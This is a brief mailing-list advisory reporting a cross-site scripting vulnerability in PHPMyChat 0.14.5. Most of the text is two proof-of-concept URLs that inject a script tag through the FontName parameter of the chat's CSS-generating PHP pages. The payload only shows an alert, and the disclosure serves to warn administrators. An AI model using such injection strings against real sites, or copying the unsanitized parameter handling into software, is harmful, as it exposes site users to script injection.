PHPHeaven PHPMyChat Cross-site Scripting Vulnerablitiy

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 




www.phpheaven.net/

Vulnerable versions: PHPMyChat 0.14.5

Proof of concept: 
http://www.example.com/chat/config/start-page.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>


http://www.example.com/chat/config/style.css.php3?Charset=iso-8859-1&medium=10&FontName=<script>var%20test=1;alert(test);</script>


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux